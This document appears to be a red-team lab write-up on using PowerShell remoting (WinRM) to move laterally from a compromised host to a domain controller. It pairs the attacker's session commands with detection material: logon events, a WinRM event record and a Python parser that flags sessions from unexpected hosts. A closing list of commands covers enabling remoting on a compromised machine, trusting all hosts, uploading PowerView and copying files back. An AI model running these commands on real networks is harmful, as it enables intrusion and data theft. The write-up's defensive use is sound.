WinRM for Lateral Movement
PowerShell remoting for lateral movement.

Execution

Attacker establishing a PSRemoting session from a compromised system 10.0.0.2 to a domain controller dc-mantvydas at 10.0.0.6:
New-PSSession -ComputerName dc-mantvydas -Credential (Get-Credential)

Id Name ComputerName ComputerType State ConfigurationName Availability
-- ---- ------------ ------------ ----- ----------------- ------------
1 Session1 dc-mantvydas RemoteMachine Opened Microsoft.PowerShell Available

PS C:\Users\mantvydas> Enter-PSSession 1
[dc-mantvydas]: PS C:\Users\spotless\Documents> calc.exe

Observations

Note the process ancestry:
On the host that initiated the connection, a 4648 logon attempt is logged, showing what process initiated it, the hostname where it connected to and which account was used:
The graphic below shows that the logon events 4648 and 4624 are logged on both the system that initiated the connection (pc-mantvydas - 4648) and the system that was logged on to (dc-mantvydas - 4624):
Additionally, %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx on the host that initiated the connection logs some interesting data for the task "WSMan Session initialize" (Event ID 6):
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-WinRM" Guid="{A7975C8F-AC13-49F1-87DA-5A984A4AB417}" />
<EventID>6</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>1</Opcode>
<Keywords>0x4000000000000002</Keywords>

# connection initiation time
<TimeCreated SystemTime="2018-07-25T21:13:36.511895800Z" />
<EventRecordID>673</EventRecordID>

# a unique connection ID
<Correlation ActivityID="{037F878B-8DF6-4F1A-BA51-432C3CDDCB47}" />

# process ID that initiated the connection
<Execution ProcessID="3172" ThreadID="2844" />
<Channel>Microsoft-Windows-WinRM/Operational</Channel>
<Computer>PC-MANTVYDAS.offense.local</Computer>
<Security UserID="S-1-5-21-1731862936-2585581443-184968265-1001" />
</System>
<EventData>

# remote host the connection was initiated to
<Data Name="connection">dc-mantvydas/wsman?PSVersion=5.1.14409.1005</Data>
</EventData>
</Event>
The same event as above, in the actual screenshot:
Since we entered a PowerShell shell on the remote system (Enter-PSSession), there is another interesting log entry showing the establishment of a remote shell. Note that the ShellID corresponds to the Correlation ActivityID observed earlier:
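The Event ID 6 record above carries everything a hunt needs to attribute an outbound WinRM session: the initiating process, the user SID, the target host, and the ActivityID that later ties it to the remote shell. The parser below is an added example, not code from the original post; it reads that record (embedded here, trimmed to the fields it uses) and flags session initializations from hosts outside an assumed allowlist of approved admin workstations.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Sample input: the page's Event ID 6 record, trimmed to the elements read below.
SAMPLE_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-WinRM" Guid="{A7975C8F-AC13-49F1-87DA-5A984A4AB417}" />
<EventID>6</EventID>
<TimeCreated SystemTime="2018-07-25T21:13:36.511895800Z" />
<Correlation ActivityID="{037F878B-8DF6-4F1A-BA51-432C3CDDCB47}" />
<Execution ProcessID="3172" ThreadID="2844" />
<Channel>Microsoft-Windows-WinRM/Operational</Channel>
<Computer>PC-MANTVYDAS.offense.local</Computer>
<Security UserID="S-1-5-21-1731862936-2585581443-184968265-1001" />
</System>
<EventData>
<Data Name="connection">dc-mantvydas/wsman?PSVersion=5.1.14409.1005</Data>
</EventData>
</Event>"""


def parse_session_init(xml_text):
    """Pull the attribution fields out of a WinRM Event ID 6 (WSMan Session initialize).

    Returns None for any other event ID so callers can feed a whole log through it."""
    root = ET.fromstring(xml_text)
    sys_el = root.find("e:System", NS)
    if sys_el.findtext("e:EventID", namespaces=NS) != "6":
        return None
    conn = root.find("e:EventData/e:Data[@Name='connection']", NS).text
    # The connection string is "<target>/wsman?PSVersion=..."; split host from query.
    target, _, query = conn.partition("/wsman")
    ps_version = parse_qs(query.lstrip("?")).get("PSVersion", [None])[0]
    return {
        "time": sys_el.find("e:TimeCreated", NS).get("SystemTime"),
        "source_host": sys_el.findtext("e:Computer", namespaces=NS),
        "pid": int(sys_el.find("e:Execution", NS).get("ProcessID")),
        "user_sid": sys_el.find("e:Security", NS).get("UserID"),
        "activity_id": sys_el.find("e:Correlation", NS).get("ActivityID"),
        "target": target,
        "ps_version": ps_version,
    }


def flag_unexpected(records, allowed_sources):
    """Keep session initializations whose source host is not an approved admin host.

    allowed_sources is an assumed, lower-cased allowlist maintained by the defender."""
    return [r for r in records if r and r["source_host"].lower() not in allowed_sources]
```

The ActivityID returned here is the value to join against the ShellID of the later shell-creation event, and the PID against a process-creation log, to recover which binary opened the session.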

Additional Useful Commands

Jules Adriaens reached out to me and suggested adding the following useful commands, so here they are:

# Enable PowerShell Remoting on the target (box needs to be compromised first)
Enable-PSRemoting -Force

# Check if a given system is listening on the WinRM port
Test-NetConnection <IP> -CommonTCPPort WINRM

# Trust all hosts:
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force

# Check what hosts are trusted
Get-Item WSMan:\localhost\Client\TrustedHosts

# Execute a command on a remote host
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname}

# Interactive session with explicit credentials
Enter-PSSession <host> -Credential <domain>\<user>

# Interactive session using Kerberos:
Enter-PSSession <host> -Authentication Kerberos

# Upload a file to the remote session
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)

# Download a file from the remote session
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)

References

A look under the hood at Powershell Remoting through a cross platform lens - Hurry Up and Wait!
Remote Services: Windows Remote Management, Sub-technique T1021.006 - Enterprise | MITRE ATT&CK®